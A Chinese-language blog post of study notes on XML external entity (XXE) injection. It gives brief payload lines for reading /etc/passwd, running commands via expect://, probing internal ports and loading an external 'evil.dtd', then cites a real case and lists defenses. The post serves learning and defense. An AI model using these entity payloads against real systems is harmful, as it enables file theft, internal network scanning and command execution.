xee
定义:
xxe也就是xml外部实体注入
影响范围
读取xml文件且允许引用外部实体的产品
怎样构建外部实体注入?
方式一:直接通过DTD外部实体声明
方式二:通过DTD文档引入外部DTD文档,再引入外部实体声明
方式三:通过DTD外部实体声明引入外部实体声明
不同程序支持协议不同
.net,java,php都支持file,http,ftp
无回显的xxe【<!ENTITY f SYSTEM "file:///e:/java/test.txt">】
危害:
1.读取任意文件
<!ENTITY xxe SYSTEM "file:///etc/passwd">
2.执行系统命令
<!ENTITY xxe SYSTEM "expect://id">
该CASE是在安装expect扩展的PHP环境里执行系统命令,其他协议也有可能可以执行系统命令。
3.探测内网端口
<!ENTITY xxe SYSTEM "http://192.168.1.1:81/mark4z5">
4.攻击内网网站
利用:#print_r($data);把数据发到服务器
案例
日前,某office文档转换软件被爆存在XXE漏洞(PS:感谢TSRC平台白帽子Titans`报告漏洞),某一应用场景为:Web程序调用该office软件来获取office文档内容后提供在线预览。由于该软件在处理office文档时,读取xml文件且允许引用外部实体,当用户上传恶意文档并预览时触发XXE攻击。
防御
1.使用开发语言提供的禁用外部实体的方法
PHP:
libxml_disable_entity_loader(true);
其他语言:
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet
2.过滤用户提交的XML数据
关键词:,SYSTEM和PUBLIC。
DTD文档引入外部DTD文档
<!DOCTYPE test SYSTEM 'http://www.test.com/evil.dtd'>
DTD文档 DOCTYPE 的那个标签,也就是DTD
DTD外部实体声明 ENTITY的那个标签
https://www.cnblogs.com/r00tuser/p/7255939.html
DTD实体是用于xml中定义引用普通文本或特殊字符的快捷方式的变量,可以内部声明或外部引用。
内部实体声明
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY writer "Bill Gates">
<!ENTITY copyright "Copyright W3School.com.cn">
]>
<test>&writer;©right;</test>
外部实体声明
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY writer SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">
<!ENTITY copyright SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">
]>
<author>&writer;©right;</author>
https://www.cnblogs.com/r00tuser/p/7255939.html
参考链接:https://security.tencent.com/index.php/blog/msg/69
本文来自博客园,作者:lzstar-A2,转载请注明原文链接:https://www.cnblogs.com/lzstar/p/15399235.html
作 者:lzstar-A2
出 处:https://www.cnblogs.com/lzstar/
关于作者:一名java转安全的在校大学生
版权声明:本文版权归作者和博客园共有,欢迎转载,但未经作者同意必须保留此段声明,且在文章页面明显位置给出原文链接。
特此声明:所有评论和私信都会在第一时间回复。也欢迎园子的大大们指正错误,共同进步。或者直接私信我
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角【推荐】一下。您的鼓励是作者坚持原创和持续写作的最大动力!
欢迎大家关注安全学习交流群菜鸟联盟(IThonest),如果您觉得文章对您有很大的帮助,您可以考虑赏博主一杯可乐以资鼓励,您的肯定将是我最大的动力。thx.
菜鸟联盟(IThonest),一个可能会有故事的qq群,欢迎大家来这里讨论,共同进步,不断学习才能不断进步。扫下面的二维码或者收藏下面的二维码关注吧(长按下面的二维码图片、并选择识别图中的二维码),个人QQ和微信的二维码也已给出,扫描下面👇的二维码一起来讨论吧!!!